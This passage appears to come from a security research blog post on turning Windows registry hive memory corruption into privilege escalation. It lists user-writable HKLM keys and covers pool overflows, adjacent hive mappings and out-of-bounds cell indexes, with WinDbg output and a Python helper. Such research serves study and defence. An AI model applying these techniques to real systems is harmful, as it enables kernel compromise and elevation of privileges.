    Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite. In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system. Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.

    Intra-hive corruption

    Let's start by investigating whether overwriting internal hive data is as impractical as it might initially seem.

    Performing hive-only attacks in privileged system hives

    To be clear, it's not completely accurate to say that hives don't contain any data worth overwriting. If you think about it, it's quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on. The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user). To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met:

    1. The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don't have that over any system hive.
    2. The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug.

    Of the two points above, the first is definitely more difficult to satisfy. Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated "offline", starting with full control over the given file. API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, less than half (specifically 8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., require the allocation of more than 500 GB of memory, or take many hours to trigger. In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the "Operating on subkeys of transactionally renamed keys" section of the report) and CVE-2023-23423 (discussed in "Freeing a shallow copy of a key node with CmpFreeKeyByCell").

    Regarding the second issue – the availability of writable keys – the situation is much better for the attacker. There are three reasons for this:

    • To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us. Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.
    • The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.
    • There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives. They do not exist in HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation.

    To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should be ultimately able to obtain a list of potential keys that can be used to corrupt a system hive.

    Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system. Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM. Some examples include:

    HKLM\SOFTWARE\Microsoft\CoreShell

    HKLM\SOFTWARE\Microsoft\DRM

    HKLM\SOFTWARE\Microsoft\Input\Locales          (and some of its subkeys)

    HKLM\SOFTWARE\Microsoft\Input\Settings         (and some of its subkeys)

    HKLM\SOFTWARE\Microsoft\Shell\Oobe

    HKLM\SOFTWARE\Microsoft\Shell\Session

    HKLM\SOFTWARE\Microsoft\Tracing                (and some of its subkeys)

    HKLM\SOFTWARE\Microsoft\Windows\UpdateApi

    HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX

    HKLM\SOFTWARE\WOW6432Node\Microsoft\DRM

    HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing

    HKLM\SYSTEM\Software\Microsoft\TIP             (and some of its subkeys)

    HKLM\SYSTEM\ControlSet001\Control\Cryptography\WebSignIn\Navigation

    HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings

    HKLM\SYSTEM\ControlSet001\Control\USB\AutomaticSurpriseRemoval

    HKLM\SYSTEM\ControlSet001\Services\BTAGService\Parameters\Settings

    As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind.

    Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user's hive, which permits read and write access to all other users in the system. I reported it to Microsoft in December 2023 (link to report), but it was deemed low severity and hasn't been fixed so far. This decision is somewhat understandable, as the behavior doesn't have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to:

    • Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.
    • Write not just to the "TypingInsights" key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it. This provides an opportunity to attack applications running within app/server silos with that user's permissions.
    • Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario.


    As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security.

    In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive. This is a good starting point, but perhaps we can find a more universal technique.

    Abusing regf inconsistency to trigger kernel pool corruption

    While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum. The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6. These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys). Some of these objects are long-lived and persist in memory as long as the hive is mounted. Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping. After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive's data maintains consistency with its own structure and associated auxiliary structures.

    For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel. In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor on the pools through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field. I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive. 

    However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format. Another idea would be, for example, to create a very long "big data" value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer. If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one. Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count - 1), then the next time the value's data is requested, a linear pool buffer overflow will occur.

    This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible. The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write. In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won't explore this further here, and instead encourage interested readers to investigate it on their own.

    Inter-hive memory corruption

    So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on. In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin's mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow. In the following sections, we will look at two such scenarios: one where the mapping of the attacked hive is in the user-mode space of the "Registry" process, and one where it resides in the kernel address space.

    Other hive mappings in the user space of the Registry process

    Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry. The layout of individual mappings in memory can be easily observed from WinDbg. To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command. An example of performing these operations is shown below.

    0: kd> !process 0 0

    **** NT ACTIVE PROCESS DUMP ****

    PROCESS ffffa58fa069f040

        SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000

        DirBase: 001ae002  ObjectTable: ffffe102d72678c0  HandleCount: 3077.

        Image: System

    PROCESS ffffa58fa074a080

        SessionId: none  Cid: 007c    Peb: 00000000  ParentCid: 0004

        DirBase: 1025ae002  ObjectTable: ffffe102d72d1d00  HandleCount: <Data Not Accessible>

        Image: Registry

    [...]

    0: kd> .process ffffa58fa074a080

    Implicit process is now ffffa58f`a074a080

    WARNING: .cache forcedecodeuser is not enabled

    0: kd> !vad

    VAD             Level         Start             End              Commit

    ffffa58fa207f740  5        152e7a20        152e7a2f               0 Mapped       READONLY           \Windows\System32\config\SAM

    ffffa58fa207dbc0  4        152e7a30        152e7b2f               0 Mapped       READONLY           \Windows\System32\config\DEFAULT

    ffffa58fa207dc60  5        152e7b30        152e7b3f               0 Mapped       READONLY           \Windows\System32\config\SECURITY

    ffffa58fa207d940  3        152e7b40        152e7d3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa207dda0  5        152e7d40        152e7f3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    [...]

    ffffa58fa207e840  5        152ec940        152ecb3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa207b780  3        152ecb40        152ecd3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa0f98ba0  5        152ecd40        152ecd4f               0 Mapped       READONLY           \EFI\Microsoft\Boot\BCD

    ffffa58fa3af5440  4        152ecd50        152ecd8f               0 Mapped       READONLY           \Windows\ServiceProfiles\NetworkService\NTUSER.DAT

    ffffa58fa3bfe9c0  5        152ecd90        152ecdcf               0 Mapped       READONLY           \Windows\ServiceProfiles\LocalService\NTUSER.DAT

    ffffa58fa3ca3d20  1        152ecdd0        152ece4f               0 Mapped       READONLY           \Windows\System32\config\BBI

    ffffa58fa2102790  6        152ece50        152ecf4f               0 Mapped       READONLY           \Users\user\NTUSER.DAT

    ffffa58fa4145640  5        152ecf50        152ed14f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS

    ffffa58fa4145460  6        152ed150        152ed34f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS

    ffffa58fa412a520  4        152ed350        152ed44f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS

    ffffa58fa412c5a0  6        152ed450        152ed64f               0 Mapped       READONLY           \Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat

    ffffa58fa4e8bf60  5        152ed650        152ed84f               0 Mapped       READONLY           \Windows\appcompat\Programs\Amcache.hve

    In the listing above, the "Start" and "End" columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on. We can immediately see that all the hives are located very close to each other, with practically no gaps in between them.

    However, this example does not directly demonstrate whether it's possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user. The addresses of the system hives appear to be already determined, and there isn't much space between them to inject our own data. Fortunately, hives can grow dynamically, especially when you start writing long values to them. This leads to the creation of new bins and mapping them at new addresses in the Registry process's memory.

    For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key. This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter "A" and the latter with the letter "B". The result of the test was immediately visible in the memory layout:

    0: kd> !vad

    VAD             Level         Start             End              Commit

    ffffa58fa67b44c0  8        15280000        152801ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b5b40  7        15280200        152803ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b46a0  8        15280400        152805ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b6540  6        15280600        152807ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b5dc0  8        15280800        152809ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b4560  7        15280a00        15280bff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b6900  8        15280c00        15280dff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b5280  5        15280e00        15280fff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b5e60  8        15281000        152811ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b7800  7        15281200        152813ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b8de0  8        15281400        152815ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    ffffa58fa67b8840  6        15281600        152817ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat

    ffffa58fa67b8980  8        15281800        152819ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE

    [...]

    What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length and tightly packed with 512 bins of 16 KiB each. Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another. Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000. If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result:

    0: kd> db 0x15280400000-30

    00000152`803fffd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

    00000152`803fffe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

    00000152`803ffff0  41 41 41 41 41 41 41 41-41 41 41 41 00 00 00 00  AAAAAAAAAAAA....

    00000152`80400000  68 62 69 6e 00 f0 bf 0c-00 40 00 00 00 00 00 00  hbin.....@......

    00000152`80400010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

    00000152`80400020  20 c0 ff ff 42 42 42 42-42 42 42 42 42 42 42 42   ...BBBBBBBBBBBB

    00000152`80400030  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB

    00000152`80400040  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB

    We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area. This, in turn, means that memory corruption could indeed spread from one hive into the other. However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty. Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other.

    After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one's own code with administrator privileges.

    Attacking adjacent memory in pool-based hive mappings

    Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools. These cases are as follows:

    1. All volatile hives, which have no persistent representation as regf files on disk. Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.
    2. The entire HKLM\SYSTEM hive, including both its stable and volatile parts.
    3. All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.
    4. Volatile storage space of every active hive in the system.

    The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions. The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn't require binary control over the input hive. However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives. This is because creating volatile keys does not require any special permissions compared to regular keys. Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other. For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space. From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below:

    A diagram illustrating memory corruption, divided into two sections. The top section, labeled "Kernel-mode paged pool," shows a memory bar containing "test.dat (volatile)" followed by several "Pool chunk" blocks and a dotted "Pool chunks..." block. The pool chunks are showed being overflowed. The bottom section, labeled "Registry process address space," shows a memory bar with a small corrupted area at the beginning, followed by "test.dat (stable)" and a dotted "... Other hives ..." block. An arrow from a "Corrupted value node" label points to this red area. A red arrow labeled "Volatile cell index" connects the "Pool corruption" in the kernel-mode paged pool to the "Corrupted value node" in the registry process address space, indicating a relationship between the two corrupted areas.

    This behavior can be further verified on a specific example. Let's consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the "HKCU\Volatile Environment" key. Let's first find the hive in WinDbg using the !reg hivelist command:

    0: kd> !reg hivelist

    ---------------------------------------------------------------------------------------------------------------------------------------------

    |     HiveAddr     |Stable Length|    Stable Map    |Volatile Length|    Volatile Map    |     BaseBlock     | FileName 

    ---------------------------------------------------------------------------------------------------------------------------------------------

    [...]

    | ffff82828fc1a000 |      ee000  | ffff82828fc1a128 |       5000    |  ffff82828fc1a3a0  | ffff82828f8cf000  | \??\C:\Users\user\ntuser.dat

    [...]

    As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages). Let's try to find the second page of this hive region in memory by translating its corresponding cell index:

    0: kd> !reg cellindex ffff82828fc1a000 80001000

    Map = ffff82828fc1a3a0 Type = 1 Table = 0 Block = 1 Offset = 0

    MapTable     = ffff82828fe6a000 

    MapEntry     = ffff82828fe6a018 

    BinAddress = ffff82828f096009, BlockOffset = 0000000000000000

    BlockAddress = ffff82828f096000 

    pcell:  ffff82828f096004

    It is a kernel-mode address, as expected. We can dump its contents to verify that it indeed contains registry data:

    0: kd> db ffff82828f096000

    ffff8282`8f096000  68 62 69 6e 00 10 00 00-00 10 00 00 00 00 00 00  hbin............

    ffff8282`8f096010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

    ffff8282`8f096020  38 ff ff ff 73 6b 00 00-20 10 00 80 20 10 00 80  8...sk.. ... ...

    ffff8282`8f096030  01 00 00 00 b0 00 00 00-01 00 04 88 98 00 00 00  ................

    ffff8282`8f096040  a4 00 00 00 00 00 00 00-14 00 00 00 02 00 84 00  ................

    ffff8282`8f096050  05 00 00 00 00 03 24 00-3f 00 0f 00 01 05 00 00  ......$.?.......

    ffff8282`8f096060  00 00 00 05 15 00 00 00-dc be 84 0b 6c 21 35 39  ............l!59

    ffff8282`8f096070  b9 d0 84 88 ea 03 00 00-00 03 14 00 3f 00 0f 00  ............?...

    Everything looks good. At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor ('sk'). Now, let's see what the !pool command tells us about this address:

    0: kd> !pool ffff82828f096000

    Pool page ffff82828f096000 region is Paged pool

    *ffff82828f096000 : large page allocation, tag is CM16, size is 0x1000 bytes

                    Pooltag CM16 : Internal Configuration manager allocations, Binary : nt!cm

    We are dealing with a paged pool allocation of 0x1000 bytes requested by the Configuration Manager. And what is located right behind it?

    0: kd> !pool ffff82828f096000+1000

    Pool page ffff82828f097000 region is Paged pool

    *ffff82828f097000 : large page allocation, tag is Obtb, size is 0x1000 bytes

                    Pooltag Obtb : object tables via EX handle.c, Binary : nt!ob

    0: kd> !pool ffff82828f096000+2000

    Pool page ffff82828f098000 region is Paged pool

    *ffff82828f098000 : large page allocation, tag is Gpbm, size is 0x1000 bytes

                    Pooltag Gpbm : GDITAG_POOL_BITMAP_BITS, Binary : win32k.sys

    The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bound writes of controlled data, but also the ability to read this OOB data beforehand. Thanks to this, the exploit does not have to operate "blindly", but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.

    The ultimate primitive: out-of-bounds cell indexes

    The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one's own hive space into taking control of other types of memory. All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic. The randomness of the memory layout carries the inherent risk that either the exploit simply won't work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness. I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes.

    As a quick reminder, cell indexes are the hive's equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table:

    A diagram of a cell map

    The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below:

    _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {

      _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map

                                ->Directory[(Index >> 21) & 0x3FF]

                                ->Table[(Index >> 12) & 0x1FF];

      return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4;

    }

    The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field. From an exploitation perspective, two facts are crucial here. First, the HvpGetCellPaged function does not perform any bounds checks on the input index. Second, for hives smaller than 2 MiB, Windows applies an additional optimization called "small dir". In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[...].Map pointer to the address of the _CMHIVE.Hive.Storage[...].SmallDir field, which simulates a single-element array. In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive. This behavior is shown in the screenshot below:

    Screenshot

    What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the "small dir" optimization is applied in both cases. As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green).

    This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the "Directory index" part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers. This situation is illustrated in the diagram below:

    Diagram described above

    In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result. An additional consideration is that in the first step, we reference OOB indexes of an "array" located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build. Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors.

    On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout:

    0: kd> dt _HMAP_ENTRY

    nt!_HMAP_ENTRY

       +0x000 BlockOffset      : Uint8B

       +0x008 PermanentBinAddress : Uint8B

       +0x010 MemAlloc         : Uint4B

    And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields. Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options.

    If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following:

    A diagram illustrating the relationships between various system components, with "CMHIVE" as the central element in a rectangular box. Several components interact directly with "CMHIVE": A box labeled "CM_KEY_SECURITY_CACHE_ENTRY" has an arrow pointing to "CMHIVE". A box labeled "CMP_VOLUME_CONTEXT" has a two-way arrow connecting it to "CMHIVE". A box labeled "CM_KEY_CONTROL_BLOCK" has a two-way arrow connecting it to "CMHIVE". A box labeled "CM_RM" has a two-way arrow connecting it to "CMHIVE". Other components are connected as follows: A box labeled "CM_KEY_SECURITY_CACHE" points to "CM_KEY_SECURITY_CACHE_ENTRY". A box labeled "FILE_OBJECT" points to "CMP_VOLUME_CONTEXT". A box labeled "CMP_VOLUME_MANAGER" has a two-way arrow with "CMP_VOLUME_CONTEXT". A box labeled "CM_NAME_CONTROL_BLOCK" has a two-way arrow with "CM_KEY_CONTROL_BLOCK". A box labeled "CM_KCB_LAYER_INFO" has a two-way arrow with "CM_KEY_CONTROL_BLOCK". "CM_KEY_CONTROL_BLOCK" points to boxes labeled "CM_KEY_BODY", "CM_TRANS", and "CM_KCB_UOW". A box labeled "KRESOURCEMANAGER" points to "CM_RM". A box labeled "KTM" points to "CM_RM".

    The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences. However, it is important to remember that not every edge in this graph will be traversable in practice. This is because of two reasons: first, due the layout of the _HMAP_ENTRY structure (i.e. 0x18-byte alignment and the need for a 0x0 value being adjacent to the given pointer), and second, due to the fact that not every pointer in these objects is always initialized. For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides some good foundation for our exploit, but it does require additional experimentation to get every technical detail right.

    Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn't perform any additional bounds checks either. So, let's stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure. We'll use the _CMHIVE → _CM_RM → _CMHIVE path for this. The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1). In the case of HKCU, both storage types are non-empty and use the "small dir" optimization, so we can choose either one; let's say volatile. Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields:

    0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir)

    (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) : 0xffff82828fc1a3a0 [Type: _HMAP_TABLE * *]

        0xffff82828fe6a000 [Type: _HMAP_TABLE *]

    0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)

    (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)                     : 0xffff82828fc1b038 [Type: _CM_RM * *]

        0xffff82828fdcc8e0 [Type: _CM_RM *]

    In this case, it is (0xffff82828fc1b038 - 0xffff82828fc1a3a0) ÷ 8 = 0x193. The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18).

    0: kd> dx (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)

    (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)                 : 0xffff82828fdcc930 [Type: _CMHIVE * *]

        0xffff82828fc1a000 [Type: _CMHIVE *]

    So, the calculation is (0xffff82828fdcc930 - 0xffff82828fdcc8e0) ÷ 0x18 = 3. Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure.

    0: kd> dt _HMAP_ENTRY 0xffff82828fdcc8e0+3*0x18

    nt!_HMAP_ENTRY

       +0x000 BlockOffset      : 0

       +0x008 PermanentBinAddress : 0xffff8282`8fc1a000

       +0x010 MemAlloc         : 0

    The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news. Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zero'ed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example.

    We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning. It is time to gather all this information in one place; we can build the final cell index using a simple Python function:

    >>> def MakeCellIndex(storage, directory, table, offset):

    ...     print("0x%x" % ((storage << 31) | (directory << 21) | (table << 12) | offset))

    ...

    And then pass the values we have established so far:

    >>> MakeCellIndex(1, 0x193, 3, 0)

    0xb2603000

    >>>

    So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000. It is now time to verify in WinDbg whether this magic index actually works as intended.

    0: kd> !reg cellindex ffff82828fc1a000 b2603000

    Map = ffff82828fc1a3a0 Type = 1 Table = 193 Block = 3 Offset = 0

    MapTable     = ffff82828fdcc8e0 

    MapEntry     = ffff82828fdcc928 

